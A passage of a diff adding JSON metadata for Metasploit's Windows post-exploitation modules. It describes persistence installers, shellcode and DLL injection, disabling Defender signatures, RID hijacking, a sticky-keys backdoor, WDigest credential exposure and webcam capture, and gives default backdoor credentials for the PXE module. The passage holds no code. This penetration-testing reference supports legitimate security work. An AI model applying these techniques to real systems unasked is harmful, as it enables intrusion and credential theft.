"post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/nbd_server": { + "name": "Windows Manage Local NBD Server for Remote Disks", + "fullname": "post/windows/manage/nbd_server", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "Maps remote disks and logical volumes to a local Network Block\n Device server. Allows for forensic tools to be executed on the remote disk directly.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/nbd_server.rb", + "is_install_path": true, + "ref_name": "windows/manage/nbd_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/peinjector": { + "name": "Peinjector", + "fullname": "post/windows/manage/peinjector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Maximiliano Tedesco " + ], + "description": "This module will inject a specified windows payload into a target executable.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/peinjector.rb", + "is_install_path": true, + "ref_name": "windows/manage/peinjector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/persistence_exe": { + "name": "Windows Manage Persistent EXE Payload Installer", + "fullname": "post/windows/manage/persistence_exe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Merlyn drforbin Cousins " + ], + "description": "This module will upload an executable to a remote host and make it Persistent.\n It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login,\n SYSTEM will start on system boot but requires privs. SERVICE will create a new service\n which will start the payload. Again requires privs.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/persistence_exe.rb", + "is_install_path": true, + "ref_name": "windows/manage/persistence_exe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/portproxy": { + "name": "Windows Manage Set Port Forwarding With PortProxy", + "fullname": "post/windows/manage/portproxy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). PortProxy\n supports TCP IPv4 and IPv6 connections.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/portproxy.rb", + "is_install_path": true, + "ref_name": "windows/manage/portproxy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/powershell/build_net_code": { + "name": "Powershell .NET Compiler", + "fullname": "post/windows/manage/powershell/build_net_code", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-14", + "type": "post", + "author": [ + "RageLtMan " + ], + "description": "This module will build a .NET source file using powershell. The compiler builds\n the executable or library in memory and produces a binary. After compilation the\n PowerShell session can also sign the executable if provided a path the\n a .pfx formatted certificate. Compiler options and a list of assemblies\n required can be configured in the datastore.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/powershell/build_net_code.rb", + "is_install_path": true, + "ref_name": "windows/manage/powershell/build_net_code", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/powershell/exec_powershell": { + "name": "Windows Manage PowerShell Download and/or Execute", + "fullname": "post/windows/manage/powershell/exec_powershell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nicholas Nam (nick ", + "RageLtMan " + ], + "description": "This module will download and execute a PowerShell script over a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/powershell/exec_powershell.rb", + "is_install_path": true, + "ref_name": "windows/manage/powershell/exec_powershell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/powershell/load_script": { + "name": "Load Scripts Into PowerShell Session", + "fullname": "post/windows/manage/powershell/load_script", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Turner benpturner ", + "Dave Hardy davehardy20 " + ], + "description": "This module will download and execute one or more PowerShell scripts\n over a present powershell session.\n Setting VERBOSE to true will show the stager results.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/powershell/load_script.rb", + "is_install_path": true, + "ref_name": "windows/manage/powershell/load_script", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/pptp_tunnel": { + "name": "Windows Manage Remote Point-to-Point Tunneling Protocol", + "fullname": "post/windows/manage/pptp_tunnel", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created we can use it to force the victim traffic to go through the\n server getting a man in the middle attack. Be sure to allow forwarding and\n masquerading on the VPN server (mitm).", + "references": [ + "URL-https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/pptp_tunnel.rb", + "is_install_path": true, + "ref_name": "windows/manage/pptp_tunnel", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/priv_migrate": { + "name": "Windows Manage Privilege Based Process Migration ", + "fullname": "post/windows/manage/priv_migrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Josh Hale \"sn0wfa11\" ", + "theLightCosine " + ], + "description": "This module will migrate a Meterpreter session based on session privileges.\n It will do everything it can to migrate, including spawning a new User level process.\n For sessions with Admin rights: It will try to migrate into a System level process in the following\n order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe.\n If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights:\n It will try to migrate to a user level process, if that fails it will attempt to spawn the process\n then migrate to it. It will attempt the User level processes in the following order:\n NAME (if specified), explorer.exe, then notepad.exe.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/priv_migrate.rb", + "is_install_path": true, + "ref_name": "windows/manage/priv_migrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/pxeexploit": { + "name": "Windows Manage PXE Exploit Server", + "fullname": "post/windows/manage/pxeexploit", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "scriptjunkie" + ], + "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any linux\n partition seen. The windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n See exploit/windows/misc/pxesploit for a version to deliver a specific payload.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/windows/manage/pxeexploit.rb", + "is_install_path": true, + "ref_name": "windows/manage/pxeexploit", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/reflective_dll_inject": { + "name": "Windows Manage Reflective DLL Injection Module", + "fullname": "post/windows/manage/reflective_dll_inject", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "b4rtik" + ], + "description": "This module will inject a specified reflective DLL into the memory of a\n process, new or existing. If arguments are specified, they are passed to\n the DllMain entry point as the lpvReserved (3rd) parameter. To read\n output from the injected process, set PID to zero and WAIT to non-zero.\n Make sure the architecture of the DLL matches the target process.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/reflective_dll_inject.rb", + "is_install_path": true, + "ref_name": "windows/manage/reflective_dll_inject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/remove_ca": { + "name": "Windows Manage Certificate Authority Removal", + "fullname": "post/windows/manage/remove_ca", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module removes the specified CA certificate from the\n system Trusted Root store.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/remove_ca.rb", + "is_install_path": true, + "ref_name": "windows/manage/remove_ca", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/remove_host": { + "name": "Windows Manage Host File Entry Removal", + "fullname": "post/windows/manage/remove_host", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module allows the attacker to remove an entry from the Windows hosts file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/remove_host.rb", + "is_install_path": true, + "ref_name": "windows/manage/remove_host", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/rid_hijack": { + "name": "Windows Manage RID Hijacking", + "fullname": "post/windows/manage/rid_hijack", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sebastian Castro " + ], + "description": "This module will create an entry on the target by modifying some properties\n of an existing account. It will change the account attributes by setting a\n Relative Identifier (RID), which should be owned by one existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module will allow to authenticate with one known account\n credentials (like GUEST account), and access with the privileges of another\n existing account (like ADMINISTRATOR account), even if the spoofed account is\n disabled.", + "references": [ + "URL-https://web.archive.org/web/20240520163742/https://csl.com.co/rid-hijacking/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/rid_hijack.rb", + "is_install_path": true, + "ref_name": "windows/manage/rid_hijack", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/rollback_defender_signatures": { + "name": "Disable Windows Defender Signatures", + "fullname": "post/windows/manage/rollback_defender_signatures", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "metasploit ", + "luisco100 " + ], + "description": "This module with appropriate rights uses the Windows Defender command-line utility to run an automation\n tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.\n The tool is prominently used for scheduling scans and updating the signature or definition files,\n but there is a switch created to restore the installed signature definitions to a previous backup copy or\n to the original default set of signatures which is none, disabling all the signatures and allowing malware\n to execute even with the Windows Defender solution enabled.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/rollback_defender_signatures.rb", + "is_install_path": true, + "ref_name": "windows/manage/rollback_defender_signatures", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ROLLBACK", + "description": "Rollback Defender signatures" + }, + { + "name": "UPDATE", + "description": "Update Defender signatures" + } + ] + }, + "post_windows/manage/rpcapd_start": { + "name": "Windows Manage Remote Packet Capture Service Starter", + "fullname": "post/windows/manage/rpcapd_start", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of Winpcap. The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n PORT will be used depending of the mode configured.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/rpcapd_start.rb", + "is_install_path": true, + "ref_name": "windows/manage/rpcapd_start", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/run_as": { + "name": "Windows Manage Run Command As User", + "fullname": "post/windows/manage/run_as", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499" + ], + "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default, by setting\n CMDOUT to true output will be redirected to a temp file and read back in to\n display. By setting advanced option SETPASS to true, it will reset the user's\n password and then execute the command.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/run_as.rb", + "is_install_path": true, + "ref_name": "windows/manage/run_as", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/run_as_psh": { + "name": "Windows 'Run As' Using PowerShell", + "fullname": "post/windows/manage/run_as_psh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "p3nt4" + ], + "description": "This module will start a process as another user using PowerShell.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/run_as_psh.rb", + "is_install_path": true, + "ref_name": "windows/manage/run_as_psh", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/sdel": { + "name": "Windows Manage Safe Delete", + "fullname": "post/windows/manage/sdel", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "The goal of the module is to hinder the recovery of deleted files by overwriting\n its contents. This could be useful when you need to download some file on the victim\n machine and then delete it without leaving clues about its contents. Note that the script\n does not wipe the free disk space so temporary/sparse/encrypted/compressed files could\n not be overwritten. Note too that MTF entries are not overwritten so very small files\n could stay resident within the stream descriptor.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/sdel.rb", + "is_install_path": true, + "ref_name": "windows/manage/sdel", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/shellcode_inject": { + "name": "Windows Manage Memory Shellcode Injection Module", + "fullname": "post/windows/manage/shellcode_inject", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "phra " + ], + "description": "This module will inject into the memory of a process a specified shellcode.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/shellcode_inject.rb", + "is_install_path": true, + "ref_name": "windows/manage/shellcode_inject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/sshkey_persistence": { + "name": "SSH Key Persistence", + "fullname": "post/windows/manage/sshkey_persistence", + "aliases": [], + "rank": 400, + "disclosure_date": null, + "type": "post", + "author": [ + "Dean Welch " + ], + "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/sshkey_persistence.rb", + "is_install_path": true, + "ref_name": "windows/manage/sshkey_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/sticky_keys": { + "name": "Sticky Keys Persistence Module", + "fullname": "post/windows/manage/sticky_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "OJ Reeves" + ], + "description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.", + "references": [ + "URL-https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit", + "URL-https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/sticky_keys.rb", + "is_install_path": true, + "ref_name": "windows/manage/sticky_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ADD", + "description": "Add the backdoor to the target." + }, + { + "name": "REMOVE", + "description": "Remove the backdoor from the target." + } + ] + }, + "post_windows/manage/vmdk_mount": { + "name": "Windows Manage VMDK Mount Drive", + "fullname": "post/windows/manage/vmdk_mount", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage\n of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the\n device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with\n extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots\n or clones are linked from the file.", + "references": [ + "URL-http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/vmdk_mount.rb", + "is_install_path": true, + "ref_name": "windows/manage/vmdk_mount", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/vss": { + "name": "Windows Manage Volume Shadow Copies", + "fullname": "post/windows/manage/vss", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module will perform management actions for Volume Shadow Copies on the system. This is based on the VSSOwn\n Script originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.", + "references": [ + "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-02-23 16:27:12 +0000", + "path": "/modules/post/windows/manage/vss.rb", + "is_install_path": true, + "ref_name": "windows/manage/vss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "VSS_CREATE", + "description": "Create a new VSS copy" + }, + { + "name": "VSS_GET_INFO", + "description": "Get VSS information" + }, + { + "name": "VSS_LIST_COPIES", + "description": "List VSS copies" + }, + { + "name": "VSS_MOUNT", + "description": "Mount a VSS copy" + }, + { + "name": "VSS_SET_MAX_STORAGE_SIZE", + "description": "Set the VSS maximum storage size" + }, + { + "name": "VSS_UNMOUNT", + "description": "Unmount a VSS copy" + } + ] + }, + "post_windows/manage/wdigest_caching": { + "name": "Windows Post Manage WDigest Credential Caching", + "fullname": "post/windows/manage/wdigest_caching", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kostas Lintovois " + ], + "description": "On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables\n credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.\n Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/wdigest_caching.rb", + "is_install_path": true, + "ref_name": "windows/manage/wdigest_caching", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/webcam": { + "name": "Windows Manage Webcam", + "fullname": "post/windows/manage/webcam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will allow the user to detect installed webcams (with\n the LIST action) or take a snapshot (with the SNAPSHOT) action.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/webcam.rb", + "is_install_path": true, + "ref_name": "windows/manage/webcam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Show a list of webcams" + }, + { + "name": "SNAPSHOT", + "description": "Take a snapshot with the webcam" + } + ] + }, + "post_windows/recon/computer_browser_discovery": { + "name": "Windows Recon Computer Browser Discovery", + "fullname": "post/windows/recon/computer_browser_discovery", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module uses railgun to discover hostnames and IPs on the network.\n LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers),\n SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers),\n NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers),\n WINDOWS (all Windows hosts), or UNIX (all Unix hosts).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/recon/computer_browser_discovery.rb", + "is_install_path": true, + "ref_name": "windows/recon/computer_browser_discovery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/recon/outbound_ports": { + "name": "Windows Outbound-Filtering Rules", + "fullname": "post/windows/recon/outbound_ports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module makes some kind of TCP traceroute to get outbound-filtering rules.\n It will try to make a TCP connection to a certain public IP address (this IP\n does not need to be under your control) using different TTL incremental values.\n This way if you get an answer (ICMP TTL time exceeded packet) from a public IP\n device you can infer that the destination port is allowed. Setting STOP to\n true the module will stop as soon as you reach a public IP (this will generate\n less noise in the network).", + "references": [ + "URL-http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/recon/outbound_ports.rb", + "is_install_path": true, + "ref_name": "windows/recon/outbound_ports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_bss_list": { + "name": "Windows Gather Wireless BSS Info", + "fullname": "post/windows/wlan/wlan_bss_list", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module gathers information about the wireless Basic Service Sets\n available to the victim machine.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": 